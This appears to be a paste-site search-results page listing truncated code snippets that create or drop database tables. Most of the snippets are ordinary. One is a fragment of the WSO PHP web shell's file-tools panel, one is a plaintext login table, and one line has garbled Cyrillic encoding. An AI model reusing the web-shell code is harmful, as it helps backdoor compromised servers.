42.7K results in 805 ms
8 years ago · Oct 05, 2017, 07:34 PM
return false; } String strStmt = "CREATE DATABASE IF NOT EXISTS battlesnitch"; try { con = DriverManager.getConnection("jdbc:mysql://"+URL+":"
8 years ago · Oct 05, 2017, 07:32 PM
return false; } String strStmt = "CREATE DATABASE IF NOT EXISTS BattleHomes"; try { con = DriverManager.getConnection("jdbc:mysql://"+URL+":"
8 years ago · Oct 05, 2017, 05:52 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Oct 05, 2017, 12:12 PM
new createinto[1001] formatex(createinto, 1000, "CREATE TABLE IF NOT EXISTS `kz_pro15` (`mapname` varchar(64) NOT
8 years ago · Oct 05, 2017, 12:10 PM
new createinto[1001] formatex(createinto, 1000, "CREATE TABLE IF NOT EXISTS `kz_pro15` (`mapname` varchar(64) NOT
8 years ago · Oct 05, 2017, 12:10 PM
new createinto[1001] formatex(createinto, 1000, "CREATE TABLE IF NOT EXISTS `kz_pro15` (`mapname` varchar(64) NOT
8 years ago · Oct 05, 2017, 11:50 AM
0900 [INFO] (transaction): SQL: CREATE TABLE IF NOT EXISTS "login_month_329ab640_bl_tmp000" ("target_date" INT8, "platform_type"
8 years ago · Oct 05, 2017, 11:50 AM
0900 [INFO] (transaction): SQL: CREATE TABLE IF NOT EXISTS "login_month_329ab640_bl_tmp000" ("target_date" INT8, "platform_type"
8 years ago · Oct 05, 2017, 08:22 AM
if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); if
8 years ago · Oct 04, 2017, 07:56 PM
array('990000'); /* select theme colors if the inclusion file exists */ $rrdcolors = "{$g['www_path']}/themes/{$g['theme']}/rrdcolors.inc.php"; if(file_exists($rrdcolors)) { include($rrdcolors);
8 years ago · Oct 04, 2017, 12:54 PM
Ñоздаём при надобноÑти Echo CREATE TABLE IF NOT EXISTS `%Table%` (^ `id` INTEGER PRIMARY
8 years ago · Oct 04, 2017, 07:54 AM
code def create_table(): c.execute("CREATE TABLE IF NOT EXISTS logins(user TEXT, pass TEXT)")
8 years ago · Oct 04, 2017, 02:28 AM
de la table `accounts` -- CREATE TABLE IF NOT EXISTS `accounts` ( `id` int(11) NOT
8 years ago · Oct 03, 2017, 09:10 PM
end end local MYSQL_CREATE_TABLES = [[ CREATE TABLE IF NOT EXISTS `nut_characters` ( `_id` int(11) unsigned
8 years ago · Oct 03, 2017, 05:38 PM
i + 1 != columns.length ? ", " : ""); } mysql.updateSQL("CREATE TABLE IF NOT EXISTS " + tableName + " (" + mySQLData + ");"); } public Object
8 years ago · Oct 03, 2017, 05:36 PM
at line 6: DROP TABLE IF EXISTS version.trf_schema_version_uid DEBUG: Found statement
8 years ago · Oct 03, 2017, 08:56 AM
sqldumptable($table, $fp=0) { $tabledump = "DROP TABLE IF EXISTS $table;\n"; $tabledump .= "CREATE TABLE $table (\n"; $firstfield=1;
8 years ago · Oct 03, 2017, 06:32 AM
for app_inquiry_access -- ---------------------------- DROP TABLE IF EXISTS "public"."app_inquiry_access"; CREATE TABLE "public"."app_inquiry_access" ( "id" int4 NOT NULL, "access_name" varchar(200) COLLATE
Total pages: 2134